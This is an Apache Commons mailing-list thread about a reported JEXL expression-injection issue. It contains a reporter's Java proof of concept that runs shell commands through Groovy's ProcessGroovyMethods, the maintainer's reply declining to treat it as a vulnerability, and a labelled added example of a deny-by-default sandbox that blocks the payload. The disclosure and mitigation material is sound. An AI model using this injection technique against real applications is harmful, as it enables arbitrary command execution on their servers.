Posted to dev@commons.apache.org by Mark Thomas <ma...@apache.org> on 2017/04/24 16:29:59 UTC
Re: CVE request for : Apache Commons JEXL Expression Execute Command Vulnerability through groovy.
The Apache Commons project will not be treating this as a security
vulnerability. Executing untrusted / unsanitized / unvalidated code in a
scripting environment is always dangerous.
Progress may be followed via:
https://issues.apache.org/jira/browse/JEXL-223
Mark
On 21/04/17 08:52, Cloudsecintel wrote:
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through
> groovy.
>
> 0x02 POC
> {code}
> import java.io.IOException;
>
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
>
> // PoC: a JEXL expression instantiates a class from the Groovy runtime (Groovy
> // must be on the classpath) and calls its static execute(String), which
> // spawns a process.
> public class elExp {
>     public static void main(String args[]) throws IOException {
>         // Create or retrieve an engine
>         JexlEngine jexl = new JexlBuilder().create();
>
>         // Outside JEXL: ProcessGroovyMethods.execute(String) runs a command.
>         // The method is static; the PoC reaches it through an instance.
>         ProcessGroovyMethods n = new ProcessGroovyMethods();
>         System.out.println(n.execute("id").toString());
>
>         // Create an expression
>         // String jexlExp = "new(\"java.lang.String\", \"hello world\")";
>         String jexlExp =
>             "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
>         JexlExpression e = jexl.createExpression(jexlExp);
>
>         // Outside JEXL: a plain ProcessBuilder also works in this JVM
>         try {
>             Process process = new ProcessBuilder("id").start();
>         } catch (IOException e1) {
>             e1.printStackTrace();
>         }
>
>         // Create a context and add data
>         JexlContext jc = new MapContext();
>         jc.set("foo", jexlExp);
>
>         // Now evaluate the expression; this is where the touch command is run
>         Object o = e.evaluate(jc);
>         System.out.println(o);
>     }
> }
> {code}
>
> Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email.
>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org
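The reply above states the project's position: an engine built with a plain new JexlBuilder().create(), as in the PoC, lets an expression reach any class on the classpath. As an added example (not code from the thread, from Cloudsecintel, or from the JEXL project), the Java below evaluates the reporter's expression through an engine built with a deny-by-default JexlSandbox, next to a benign expression that the same sandbox still permits. It assumes the Commons JEXL 3.0/3.1 API (JexlSandbox, JexlBuilder.sandbox(), JexlSandbox.white(); later 3.x releases renamed white()/black() to allow()/block()); the class and member names SandboxedJexl, POC_EXPR, sandboxedEngine and evaluate are this example's own. Groovy does not need to be installed: the sandbox refuses the constructor by class name before anything is loaded, so the PoC expression throws either way.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

/**
 * Added example, not from the thread or the JEXL project.
 * Assumes Commons JEXL 3.0/3.1: JexlSandbox, JexlBuilder.sandbox(), white().
 */
public class SandboxedJexl {

    /** The reporter's expression from the thread, treated here as untrusted input. */
    static final String POC_EXPR =
        "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";

    /**
     * Engine that denies everything by default. new JexlSandbox(false) gives
     * every unlisted class the ALL_BLACK permissions (no constructor, method
     * or property access); white(...) then opens exactly what the application
     * needs, method by method.
     */
    static JexlEngine sandboxedEngine() {
        JexlSandbox sandbox = new JexlSandbox(false);
        // Only these String methods may be called; anything else on String,
        // including getClass(), stays blocked.
        sandbox.white("java.lang.String").execute("length", "toUpperCase", "trim");
        return new JexlBuilder()
            .sandbox(sandbox)
            .strict(true)    // unknown variables are errors, not silent nulls
            .silent(false)   // failures throw JexlException instead of returning null
            .create();
    }

    /**
     * Evaluates an expression against the given engine. Application data goes
     * into the context as a variable; it is never concatenated into the
     * expression text.
     */
    static Object evaluate(JexlEngine jexl, String expr, String name) {
        JexlContext ctx = new MapContext();
        ctx.set("name", name);
        return jexl.createExpression(expr).evaluate(ctx);
    }

    public static void main(String[] args) {
        JexlEngine sandboxed = sandboxedEngine();

        // Legitimate use still works: whitelisted methods on a context value.
        System.out.println(evaluate(sandboxed, "name.trim().toUpperCase()", "  alice "));

        // A method that is not on the list is refused even on a whitelisted class.
        try {
            evaluate(sandboxed, "name.getClass()", "alice");
            System.out.println("getClass() was allowed: sandbox not in effect");
        } catch (JexlException ex) {
            System.out.println("blocked: " + ex.getMessage());
        }

        // The PoC expression: the constructor lookup for an unlisted class
        // yields nothing, evaluation throws, and no process is spawned.
        try {
            evaluate(sandboxed, POC_EXPR, "alice");
            System.out.println("PoC expression was allowed: sandbox not in effect");
        } catch (JexlException ex) {
            System.out.println("blocked: " + ex.getMessage());
        }
    }
}
```

The sandbox narrows what an expression can reach; it does not change the point made in the reply. An application that evaluates attacker-controlled expression text is still running attacker code inside its JVM, and every method left on the white list is part of that attack surface, so the list should be the handful of calls the feature genuinely needs rather than whole classes.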
Re: CVE request for : Apache Commons JEXL Expression Execute Command Vulnerability through groovy.
Posted by Mark Thomas <ma...@apache.org>.
(all addressees apart from dev@commons.a.o moved to bcc)
All,
My apologies.
I intended to send this to the Commons PMC's private list and put the
wrong addressee for the Commons project.
Fortunately the issue is already largely public at
https://issues.apache.org/jira/browse/JEXL-223 but even so, this message
should not have been sent to the public dev list.
Again, my apologies for my error.
Mark
On 24/04/17 17:29, Mark Thomas wrote:
<snip/>